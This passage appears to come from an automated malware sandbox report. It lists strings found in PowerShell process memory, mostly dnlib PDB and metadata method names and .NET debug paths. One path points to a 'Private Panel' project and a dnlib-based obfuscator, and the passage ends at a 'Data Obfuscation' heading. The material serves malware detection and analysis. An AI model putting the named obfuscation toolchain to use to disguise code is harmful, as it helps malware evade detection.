        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: omation.pdb source: powershell.exe, 00000002.00000002.2311562493.000001242A3DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: ows\dll\System.pdb$ source: powershell.exe, 00000002.00000002.2309336237.000001242A144000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
